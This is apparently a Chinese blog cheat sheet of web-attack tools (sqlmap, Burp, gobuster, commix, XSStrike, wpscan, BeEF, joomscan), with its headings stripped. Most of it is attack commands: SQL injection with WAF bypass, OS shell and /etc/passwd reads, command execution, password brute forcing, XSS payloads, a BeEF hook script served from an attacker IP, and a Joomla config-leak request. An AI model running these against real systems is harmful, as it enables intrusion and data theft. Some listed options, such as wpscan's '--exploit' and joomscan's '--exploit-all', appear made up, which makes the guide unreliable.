作用:
自动化检测与利用SQL注入漏洞,支持数据库指纹识别、数据提取等
语法:
shsqlmap -u "<目标URL>" [参数]
核心参数:
--level=5:测试深度(1-5,默认1)--risk=3:风险等级(1-3,默认1)--tamper=space2comment:混淆注入语句(绕过WAF)--dbs:列举所有数据库-D dbname --tables:指定数据库列举表--dump -T users:导出指定表数据--os-shell:尝试获取系统Shell--file-read=/etc/passwd:读取服务器文件示例:
shsqlmap -u "http://example.com/news.php?id=1" --dbs --tamper=between,randomcase --level=5 --risk=3
作用:
拦截/修改HTTP请求、漏洞扫描、爆破攻击、逻辑漏洞测试
核心模块:
典型攻击流程:
Active Scan启动自动化扫描Collaborator检测盲注漏洞参数示例(爆破密码):
sh# 使用Intruder的Cluster bomb模式爆破登录接口
POST /login HTTP/1.1
username=§admin§&password=§123456§
作用:
通过字典爆破Web隐藏目录与文件
语法(GUI):
dirbusterhttp://example.com/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtphp,html,zipCLI替代工具(gobuster):
shgobuster dir -u http://example.com -w wordlist.txt -x php,html -t 50
作用:
检测与利用命令注入漏洞(支持OS命令/RCE)
语法:
shcommix -u "http://example.com/cmd.php?input=test"
参数详解:
--os-cmd=whoami:执行指定系统命令--shell:获取交互式Shell--tamper=space2plus:混淆攻击载荷--delay=1:请求间隔时间(防触发WAF)示例:
shcommix -u "http://example.com/ping.php?ip=127.0.0.1" --os-cmd="id" --tamper=base64encode
作用:
智能化XSS漏洞检测与利用,支持绕过过滤机制
语法:
shpython3 xsstrike.py -u "http://example.com/search?q=test"
参数详解:
--crawl:深度爬取目标网站--blind:检测盲打XSS--path:指定自定义Payload路径--skip-dom:跳过DOM型XSS检测Payload绕过技巧:
html<svg/onload=alert(1)>
<img src=x onerror="alert(1)">
作用:
WordPress漏洞利用(插件/主题RCE、权限提升等)
攻击参数:
--password-attack wp-login:爆破后台登录--exploit theme:twentytwenty:利用指定主题漏洞--max-threads 20:增加爆破线程示例(主题漏洞利用):
shwpscan --url http://example.com --exploit theme:twentyfifteen
作用:
劫持浏览器会话,实施客户端攻击
使用流程:
shbeef-xss
html<script src="http://<Kali_IP>:3000/hook.js"></script>
模块示例:
javascriptbeef.execute(function() {
alert('You are hooked!');
});
作用:
Joomla! CMS漏洞检测与利用
语法:
shjoomscan -u http://example.com --enumerate-components --exploit-all
参数详解:
--enumerate-components:枚举安装的组件--exploit-all:尝试所有已知漏洞利用--cookiejar cookies.txt:使用认证Cookie典型漏洞利用:
shcurl http://example.com/api/index.php/v1/config/application?public=true
| 工具 | 最佳适用场景 | 攻击类型覆盖 | 自动化程度 |
|---|---|---|---|
| SQLMap | SQL注入/数据库拖取 | 数据库层攻击 | 全自动 |
| Burp Suite | 复杂逻辑漏洞/手动测试 | 全类型Web漏洞 | 半自动 |
| XSStrike | XSS绕过与利用 | 客户端脚本攻击 | 高 |
| BeEF | 浏览器劫持/社会工程 | 客户端攻击 | 交互式 |
| ``` |
本文作者:晏秋
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!